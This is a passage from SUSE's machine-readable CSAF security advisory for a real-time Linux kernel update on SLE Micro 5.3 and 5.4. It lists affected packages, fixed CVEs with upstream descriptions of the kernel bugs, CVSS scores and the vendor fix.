"summary": "SUSE CVE CVE-2026-23054 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23054/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23060 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23060/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23074 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23074/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23089 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23089/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23191 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23191/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23204 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23204/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23209 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23209/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23268 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23268/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23269 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23269/"
}
],
"title": "Security update for the Linux Kernel",
"tracking": {
"current_release_date": "2026-03-27T16:02:21Z",
"generator": {
"date": "2026-03-27T16:02:21Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1131-1",
"initial_release_date": "2026-03-27T16:02:21Z",
"revision_history": [
{
"date": "2026-03-27T16:02:21Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-devel-rt-5.14.21-150400.15.145.1.noarch",
"product": {
"name": "kernel-devel-rt-5.14.21-150400.15.145.1.noarch",
"product_id": "kernel-devel-rt-5.14.21-150400.15.145.1.noarch"
}
},
{
"category": "product_version",
"name": "kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"product": {
"name": "kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"product_id": "kernel-source-rt-5.14.21-150400.15.145.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "cluster-md-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "cluster-md-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product_id": "cluster-md-kmp-rt-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "dlm-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "dlm-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product_id": "dlm-kmp-rt-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "gfs2-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "gfs2-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product_id": "gfs2-kmp-rt-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kernel-rt-5.14.21-150400.15.145.1.x86_64",
"product_id": "kernel-rt-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-devel-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kernel-rt-devel-5.14.21-150400.15.145.1.x86_64",
"product_id": "kernel-rt-devel-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-extra-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kernel-rt-extra-5.14.21-150400.15.145.1.x86_64",
"product_id": "kernel-rt-extra-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-livepatch-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kernel-rt-livepatch-5.14.21-150400.15.145.1.x86_64",
"product_id": "kernel-rt-livepatch-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-livepatch-devel-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kernel-rt-livepatch-devel-5.14.21-150400.15.145.1.x86_64",
"product_id": "kernel-rt-livepatch-devel-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt-optional-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kernel-rt-optional-5.14.21-150400.15.145.1.x86_64",
"product_id": "kernel-rt-optional-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt_debug-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kernel-rt_debug-5.14.21-150400.15.145.1.x86_64",
"product_id": "kernel-rt_debug-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-rt_debug-devel-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kernel-rt_debug-devel-5.14.21-150400.15.145.1.x86_64",
"product_id": "kernel-rt_debug-devel-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kernel-syms-rt-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kernel-syms-rt-5.14.21-150400.15.145.1.x86_64",
"product_id": "kernel-syms-rt-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "kselftests-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "kselftests-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product_id": "kselftests-kmp-rt-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "ocfs2-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "ocfs2-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product_id": "ocfs2-kmp-rt-5.14.21-150400.15.145.1.x86_64"
}
},
{
"category": "product_version",
"name": "reiserfs-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product": {
"name": "reiserfs-kmp-rt-5.14.21-150400.15.145.1.x86_64",
"product_id": "reiserfs-kmp-rt-5.14.21-150400.15.145.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Micro 5.3",
"product": {
"name": "SUSE Linux Enterprise Micro 5.3",
"product_id": "SUSE Linux Enterprise Micro 5.3",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-micro:5.3"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Micro 5.4",
"product": {
"name": "SUSE Linux Enterprise Micro 5.4",
"product_id": "SUSE Linux Enterprise Micro 5.4",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-micro:5.4"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-5.14.21-150400.15.145.1.x86_64 as component of SUSE Linux Enterprise Micro 5.3",
"product_id": "SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64"
},
"product_reference": "kernel-rt-5.14.21-150400.15.145.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Micro 5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-source-rt-5.14.21-150400.15.145.1.noarch as component of SUSE Linux Enterprise Micro 5.3",
"product_id": "SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
},
"product_reference": "kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Micro 5.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-5.14.21-150400.15.145.1.x86_64 as component of SUSE Linux Enterprise Micro 5.4",
"product_id": "SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64"
},
"product_reference": "kernel-rt-5.14.21-150400.15.145.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Micro 5.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-source-rt-5.14.21-150400.15.145.1.noarch as component of SUSE Linux Enterprise Micro 5.4",
"product_id": "SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
},
"product_reference": "kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Micro 5.4"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-49604",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-49604"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nip: Fix data-races around sysctl_ip_fwd_use_pmtu.\n\nWhile reading sysctl_ip_fwd_use_pmtu, it can be changed concurrently.\nThus, we need to add READ_ONCE() to its readers.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-49604",
"url": "https://www.suse.com/security/cve/CVE-2022-49604"
},
{
"category": "external",
"summary": "SUSE Bug 1238414 for CVE-2022-49604",
"url": "https://bugzilla.suse.com/1238414"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2022-49604"
},
{
"cve": "CVE-2022-49943",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-49943"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: gadget: Fix obscure lockdep violation for udc_mutex\n\nA recent commit expanding the scope of the udc_lock mutex in the\ngadget core managed to cause an obscure and slightly bizarre lockdep\nviolation. In abbreviated form:\n\n======================================================\nWARNING: possible circular locking dependency detected\n5.19.0-rc7+ #12510 Not tainted\n------------------------------------------------------\nudevadm/312 is trying to acquire lock:\nffff80000aae1058 (udc_lock){+.+.}-{3:3}, at: usb_udc_uevent+0x54/0xe0\n\nbut task is already holding lock:\nffff000002277548 (kn-\u003eactive#4){++++}-{0:0}, at: kernfs_seq_start+0x34/0xe0\n\nwhich lock already depends on the new lock.\n\nthe existing dependency chain (in reverse order) is:\n\n-\u003e #3 (kn-\u003eactive#4){++++}-{0:0}:\n lock_acquire+0x68/0x84\n __kernfs_remove+0x268/0x380\n kernfs_remove_by_name_ns+0x58/0xac\n sysfs_remove_file_ns+0x18/0x24\n device_del+0x15c/0x440\n\n-\u003e #2 (device_links_lock){+.+.}-{3:3}:\n lock_acquire+0x68/0x84\n __mutex_lock+0x9c/0x430\n mutex_lock_nested+0x38/0x64\n device_link_remove+0x3c/0xa0\n _regulator_put.part.0+0x168/0x190\n regulator_put+0x3c/0x54\n devm_regulator_release+0x14/0x20\n\n-\u003e #1 (regulator_list_mutex){+.+.}-{3:3}:\n lock_acquire+0x68/0x84\n __mutex_lock+0x9c/0x430\n mutex_lock_nested+0x38/0x64\n regulator_lock_dependent+0x54/0x284\n regulator_enable+0x34/0x80\n phy_power_on+0x24/0x130\n __dwc2_lowlevel_hw_enable+0x100/0x130\n dwc2_lowlevel_hw_enable+0x18/0x40\n dwc2_hsotg_udc_start+0x6c/0x2f0\n gadget_bind_driver+0x124/0x1f4\n\n-\u003e #0 (udc_lock){+.+.}-{3:3}:\n __lock_acquire+0x1298/0x20cc\n lock_acquire.part.0+0xe0/0x230\n lock_acquire+0x68/0x84\n __mutex_lock+0x9c/0x430\n mutex_lock_nested+0x38/0x64\n usb_udc_uevent+0x54/0xe0\n\nEvidently this was caused by the scope of udc_mutex being too large.\nThe mutex is only meant to protect udc-\u003edriver along with a few other\nthings. As far as I can tell, there\u0027s no reason for the mutex to be\nheld while the gadget core calls a gadget driver\u0027s -\u003ebind or -\u003eunbind\nroutine, or while a UDC is being started or stopped. (This accounts\nfor link #1 in the chain above, where the mutex is held while the\ndwc2_hsotg_udc is started as part of driver probing.)\n\nGadget drivers\u0027 -\u003edisconnect callbacks are problematic. Even though\nusb_gadget_disconnect() will now acquire the udc_mutex, there\u0027s a\nwindow in usb_gadget_bind_driver() between the times when the mutex is\nreleased and the -\u003ebind callback is invoked. If a disconnect occurred\nduring that window, we could call the driver\u0027s -\u003edisconnect routine\nbefore its -\u003ebind routine. To prevent this from happening, it will be\nnecessary to prevent a UDC from connecting while it has no gadget\ndriver. This should be done already but it doesn\u0027t seem to be;\ncurrently usb_gadget_connect() has no check for this. Such a check\nwill have to be added later.\n\nSome degree of mutual exclusion is required in soft_connect_store(),\nwhich can dereference udc-\u003edriver at arbitrary times since it is a\nsysfs callback. The solution here is to acquire the gadget\u0027s device\nlock rather than the udc_mutex. Since the driver core guarantees that\nthe device lock is always held during driver binding and unbinding,\nthis will make the accesses in soft_connect_store() mutually exclusive\nwith any changes to udc-\u003edriver.\n\nLastly, it turns out there is one place which should hold the\nudc_mutex but currently does not: The function_show() routine needs\nprotection while it dereferences udc-\u003edriver. The missing lock and\nunlock calls are added.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-49943",
"url": "https://www.suse.com/security/cve/CVE-2022-49943"
},
{
"category": "external",
"summary": "SUSE Bug 1244904 for CVE-2022-49943",
"url": "https://bugzilla.suse.com/1244904"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2022-49943"
},
{
"cve": "CVE-2022-49980",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-49980"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: gadget: Fix use-after-free Read in usb_udc_uevent()\n\nThe syzbot fuzzer found a race between uevent callbacks and gadget\ndriver unregistration that can cause a use-after-free bug:\n\n---------------------------------------------------------------\nBUG: KASAN: use-after-free in usb_udc_uevent+0x11f/0x130\ndrivers/usb/gadget/udc/core.c:1732\nRead of size 8 at addr ffff888078ce2050 by task udevd/2968\n\nCPU: 1 PID: 2968 Comm: udevd Not tainted 5.19.0-rc4-next-20220628-syzkaller #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google\n06/29/2022\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0xcd/0x134 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:317 [inline]\n print_report.cold+0x2ba/0x719 mm/kasan/report.c:433\n kasan_report+0xbe/0x1f0 mm/kasan/report.c:495\n usb_udc_uevent+0x11f/0x130 drivers/usb/gadget/udc/core.c:1732\n dev_uevent+0x290/0x770 drivers/base/core.c:2424\n---------------------------------------------------------------\n\nThe bug occurs because usb_udc_uevent() dereferences udc-\u003edriver but\ndoes so without acquiring the udc_lock mutex, which protects this\nfield. If the gadget driver is unbound from the udc concurrently with\nuevent processing, the driver structure may be accessed after it has\nbeen deallocated.\n\nTo prevent the race, we make sure that the routine holds the mutex\naround the racing accesses.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-49980",
"url": "https://www.suse.com/security/cve/CVE-2022-49980"
},
{
"category": "external",
"summary": "SUSE Bug 1245110 for CVE-2022-49980",
"url": "https://bugzilla.suse.com/1245110"
},
{
"category": "external",
"summary": "SUSE Bug 1245111 for CVE-2022-49980",
"url": "https://bugzilla.suse.com/1245111"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2022-49980"
},
{
"cve": "CVE-2022-50232",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-50232"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narm64: set UXN on swapper page tables\n\n[ This issue was fixed upstream by accident in c3cee924bd85 (\"arm64:\n head: cover entire kernel image in initial ID map\") as part of a\n large refactoring of the arm64 boot flow. This simple fix is therefore\n preferred for -stable backporting ]\n\nOn a system that implements FEAT_EPAN, read/write access to the idmap\nis denied because UXN is not set on the swapper PTEs. As a result,\nidmap_kpti_install_ng_mappings panics the kernel when accessing\n__idmap_kpti_flag. Fix it by setting UXN on these PTEs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-50232",
"url": "https://www.suse.com/security/cve/CVE-2022-50232"
},
{
"category": "external",
"summary": "SUSE Bug 1244758 for CVE-2022-50232",
"url": "https://bugzilla.suse.com/1244758"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2022-50232"
},
{
"cve": "CVE-2023-52433",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-52433"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_rbtree: skip sync GC for new elements in this transaction\n\nNew elements in this transaction might expired before such transaction\nends. Skip sync GC for such elements otherwise commit path might walk\nover an already released object. Once transaction is finished, async GC\nwill collect such expired element.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-52433",
"url": "https://www.suse.com/security/cve/CVE-2023-52433"
},
{
"category": "external",
"summary": "SUSE Bug 1220137 for CVE-2023-52433",
"url": "https://bugzilla.suse.com/1220137"
},
{
"category": "external",
"summary": "SUSE Bug 1245982 for CVE-2023-52433",
"url": "https://bugzilla.suse.com/1245982"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "important"
}
],
"title": "CVE-2023-52433"
},
{
"cve": "CVE-2023-52923",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-52923"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: adapt set backend to use GC transaction API\n\nUse the GC transaction API to replace the old and buggy gc API and the\nbusy mark approach.\n\nNo set elements are removed from async garbage collection anymore,\ninstead the _DEAD bit is set on so the set element is not visible from\nlookup path anymore. Async GC enqueues transaction work that might be\naborted and retried later.\n\nrbtree and pipapo set backends does not set on the _DEAD bit from the\nsync GC path since this runs in control plane path where mutex is held.\nIn this case, set elements are deactivated, removed and then released\nvia RCU callback, sync GC never fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-52923",
"url": "https://www.suse.com/security/cve/CVE-2023-52923"
},
{
"category": "external",
"summary": "SUSE Bug 1236104 for CVE-2023-52923",
"url": "https://bugzilla.suse.com/1236104"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2023-52923"
},
{
"cve": "CVE-2023-53178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53178"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm: fix zswap writeback race condition\n\nThe zswap writeback mechanism can cause a race condition resulting in\nmemory corruption, where a swapped out page gets swapped in with data that\nwas written to a different page.\n\nThe race unfolds like this:\n1. a page with data A and swap offset X is stored in zswap\n2. page A is removed off the LRU by zpool driver for writeback in\n zswap-shrink work, data for A is mapped by zpool driver\n3. user space program faults and invalidates page entry A, offset X is\n considered free\n4. kswapd stores page B at offset X in zswap (zswap could also be\n full, if so, page B would then be IOed to X, then skip step 5.)\n5. entry A is replaced by B in tree-\u003erbroot, this doesn\u0027t affect the\n local reference held by zswap-shrink work\n6. zswap-shrink work writes back A at X, and frees zswap entry A\n7. swapin of slot X brings A in memory instead of B\n\nThe fix:\nOnce the swap page cache has been allocated (case ZSWAP_SWAPCACHE_NEW),\nzswap-shrink work just checks that the local zswap_entry reference is\nstill the same as the one in the tree. If it\u0027s not the same it means that\nit\u0027s either been invalidated or replaced, in both cases the writeback is\naborted because the local entry contains stale data.\n\nReproducer:\nI originally found this by running `stress` overnight to validate my work\non the zswap writeback 